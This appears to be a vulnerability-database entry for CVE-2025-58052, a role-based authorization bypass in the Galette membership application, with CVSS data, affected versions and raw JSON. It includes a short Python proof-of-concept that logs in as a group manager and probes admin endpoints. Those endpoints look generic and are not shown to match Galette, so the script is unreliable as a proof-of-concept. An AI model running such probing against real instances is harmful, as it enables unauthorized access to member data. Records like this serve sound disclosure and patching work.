Security Vulnerability Report
CVE-2025-58052 (CVSS 3.1 base score 8.1, HIGH)

Published: 2025-12-19 17:15:52
Last Modified: 2026-04-29 01:00:02

Description

Galette is a membership management web application for non-profit organizations. Starting in version 0.9.6 and prior to version 1.2.0, attackers holding the group manager role can bypass intended restrictions, allowing unauthorized access and changes despite role-based controls. Because it requires privileged access initially, exploitation is restricted to malicious insiders or compromised group manager accounts. Version 1.2.0 fixes the issue.

CVSS Details

CVSS 3.1 (NVD, Primary)
Score: 8.1
Severity: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
Exploitability subscore: 2.8, impact subscore: 5.2

CVSS 4.0 (CNA, Secondary)
Score: 2.1
Severity: LOW
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
Note that the two ratings disagree sharply: NVD rates confidentiality and integrity impact as HIGH, while the CNA's 4.0 assessment records no confidentiality impact and only LOW integrity impact. Both scores agree that the attacker must already hold a low-privilege (group manager) account, that no user interaction is needed, and that a proof-of-concept exists.

Weakness: CWE-863 (Incorrect Authorization)

Configurations (Affected Products)

cpe:2.3:a:galette:galette:*:*:*:*:*:*:*:* - VULNERABLE (versionEndExcluding 1.2.0)
Affected range: 0.9.6 <= version < 1.2.0
Galette 0.9.6
Galette 0.9.7
Galette 0.9.8
Galette 0.9.9
Galette 1.0.0
Galette 1.0.x
Galette 1.1.0
Galette 1.1.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-58052 PoC - Galette privilege bypass vulnerability
# Requires valid credentials for a group manager account
import requests

TARGET_URL = "http://target-galette-instance.com"
USERNAME = "attacker_group_manager"
PASSWORD = "compromised_password"


def exploit_privilege_bypass():
    """
    Use the Galette group manager privilege bypass to reach resources
    the group manager role is not authorized for.
    """
    session = requests.Session()

    # Step 1: log in to obtain an authenticated session
    login_data = {
        "login": USERNAME,
        "password": PASSWORD
    }
    response = session.post(f"{TARGET_URL}/login", data=login_data)
    if response.status_code != 200:
        print("[-] Login failed")
        return
    print("[+] Logged in as group manager")

    # Step 2: request protected endpoints (normally not accessible to a group manager)
    protected_endpoints = [
        "/api/admin/users",
        "/api/admin/settings",
        "/api/admin/configurations",
        "/admin/full_access_users"
    ]

    for endpoint in protected_endpoints:
        response = session.get(f"{TARGET_URL}{endpoint}")
        if response.status_code == 200:
            print(f"[!] Privilege bypass succeeded: {endpoint}")
            print(f"[+] Response body: {response.text[:500]}")
        elif response.status_code == 403:
            print(f"[-] Access denied: {endpoint}")
        else:
            print(f"[*] Status code: {response.status_code} - {endpoint}")


if __name__ == "__main__":
    exploit_privilege_bypass()
```

References

https://github.com/galette/galette/security/advisories/GHSA-gp9g-gf56-fcxx (Exploit, Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-58052",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-19T17:15:52.293",
    "lastModified": "2026-04-29T01:00:01.613",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Galette is a membership management web application for non profit organizations. Starting in version 0.9.6 and prior to version 1.2.0, attackers with group manager role can bypass intended restrictions allowing unauthorized access and changes despite role-based controls. Since it requires privileged access initially, exploitation is restricted to malicious insiders or compromised group managers accounts. Version 1.2.0 fixes the issue."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 2.1,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "LOW",
            "vulnAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "PROOF_OF_CONCEPT",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-863"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:galette:galette:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "1.2.0",
                "matchCriteriaId": "C73ECAC2-D9C6-439D-B19F-9D21D0A4FFAD"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/galette/galette/security/advisories/GHSA-gp9g-gf56-fcxx",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}
```